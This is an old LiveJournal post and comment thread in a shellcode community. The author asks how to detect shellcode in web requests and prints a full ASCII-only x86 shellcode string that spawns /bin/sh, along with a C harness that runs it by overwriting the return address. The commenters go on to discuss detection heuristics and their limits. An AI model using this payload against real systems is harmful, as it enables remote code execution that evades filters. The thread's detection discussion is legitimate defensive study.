Steve Kemp ([info]skx) wrote in [info]shellcode,
@ 2003-08-05 21:38:00
Previous Entry  Add to memories!  Tell a Friend!  Next Entry
IDS evasion..

 I was thinking about remote exploits earlier - how to debug an application which you've overflowed remotely.

 As a sample I wrote an Apache module which contained a static buffer and was overflowable - but before I could really get into working through it I started wondering how to catch this.. This is me with my white-hat on ;)

 The obvious approach would be to write, yet another, Apache module which would filter out requests which contained "shellcode" - as this would have to be part of the request...

 However this soon proved tricky - how do you recognise shellcode? NOP's? THe string '/bin/sh'? These can all be obfuscated away - and NOPs are only used for padding when you're not sure of the exact offset anyway.

 So I thought about frequency counts of the characters in the URL - looking for non-ASCII characters.

 After a while though I realised that you could write shellcode in pure ASCII.

 This is the result:

/*
 * Run a shell via asm - ASCII only.
 *
 */

char shellcode[] =
  "LLLLYhb0pLX5b0pLHSSPPWQPPaPWSUTBRDJfh5tDS"
  "RajYX0Dka0TkafhN9fYf1Lkb0TkdjfY0Lkf0Tkgfh"
  "6rfYf1Lki0tkkh95h8Y1LkmjpY0Lkq0tkrh2wnuX1"
  "Dks0tkwjfX0Dkx0tkx0tkyCjnY0LkzC0TkzCCjtX0"
  "DkzC0tkzCj3X0Dkz0TkzC0tkzChjG3IY1LkzCCCC0"
  "tkzChpfcMX1DkzCCCC0tkzCh4pCnY1Lkz1TkzCCCC"
  "fhJGfXf1Dkzf1tkzCCjHX0DkzCCCCjvY0LkzCCCjd"
  "X0DkzC0TkzCjWX0Dkz0TkzCjdX0DkzCjXY0Lkz0tk"
  "zMdgvvn9F1r8F55h8pG9wnuvjrNfrVx2LGkG3IDpf"
  "cM2KgmnJGgbinYshdvD9d";


int main(int argc, char *argv[])
{
  int *ret;

  printf("Length is %d\n",strlen(shellcode));
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
  return( 0 );
}

 So the question remains - How do you detect shellcode?



(Post a new comment)


[info]hughe
2003-08-05 03:23 pm UTC (link)
answer: you execute it in a sandbox until it works :)

(Reply to this)(Thread)


[info]hughe
2003-08-05 04:46 pm UTC (link)
seriously, though...

process each byte as the start of a shellcode sequence and interpret it to get x number of valid instructions.

of course it will probably be urlencoded, and might be mangled in another way depending on the exploit (eg, try finding shellcode in a format string type exploit string)

The problem is most likely that strings that aren't shellcode will get mistaken for shellcode, file uploads, uuencoded stuff etc.

heres a task.. write shellcode in ascii that actualy says something (ok it doesn't need to start a shell but must do something of value)

(Reply to this)(Parent)(Thread)


[info]skx
2003-08-06 05:02 am UTC (link)
I guess you'd need to do the intpretation to know how many bytes each instruction+operands took up - but it feels like the wrong way to do it.

(have you seen the intel reference manuals - they're huge).

I think you could ignore file uploads and form postings in general as the encoding would be known, and you could ignore downloads too if you assume that you're going to only look at requests.

One issue I see is fragmentation - it could be the case that a few requests could be made each containing a section of the evil shellcode, and the exploit would search for and reassmble them in the target...

(Reply to this)(Parent)(Thread)


[info]hughe
2003-08-06 05:22 am UTC (link)
> (have you seen the intel reference manuals - they're huge).

i was up til 4am last night reading through some of the intel pdfs, so yes :)

> it could be the case that a few requests could be made each containing a section of the evil shellcode, and the exploit would search for and reassmble them in the target...

but to do that there would need to be some type of executable machine code to connect them.

I wonder how time consuming executing the bytes until a sequence of valid code is found (say 8 valid instructions?)

There doen't seem much point of looking for a particular sequence, because it can always be obfuscated.

btw.. did you have time to look at asm_calling_procedures.html?

(Reply to this)(Parent)(Thread)


[info]skx
2003-08-06 05:35 am UTC (link)
Limiting yourself to ASCII narrows it down a bit though - as you can see from this ASCII opcode table.

(I had a look at your asm piece, but haven't had time to digest it yet).

(Reply to this)(Parent)


[info]andiblue
2003-11-21 03:22 am UTC (link)
So the question remains - How do you detect shellcode?

from a theoretical point of view - if there are boundless ways to represent shellcode (programs) [which with you creative programmers I am sure this is sort-of true, but arguable] then you cannot create a general method to detect all executing shellcode (certainly not statically) - I have a proof which shows this for viruses a simple modification would demonstrate it for shellcode (obviously i use a possible idealistic model)

with regards to sandboxing (dynamic analysis ;)... if you sandbox the code you run into the the halting problem - ie when should we call it a day with the code we are analysing and let it do its job...? or chuck it out?

The best we could do may be an over-optimistic analysis which would produce false-positives (but would otherwise work fine.)

any thoughts?

(Reply to this)(Thread)


[info]skx
2003-11-25 05:05 am UTC (link)
Yes I agree - you cannot do this reliably, as it's just too easy to use some kind of polymorphic code generation to mask your shellcode.

The best you can do is look for indicators such as large numbers of nops/nulls and strings like /bin/sh.

I think that the heuristic approach would work well for a while, but it would just be a matter of time before it changed into an arms race.

(For example mod_security does some filtering of incoming Apache requests based on pattern matching; it's something like the system I was mentioning previously).

(Reply to this)(Parent)


Create an Account
Forgot your login?
Login w/ OpenID
English • Español • Deutsch • Русский…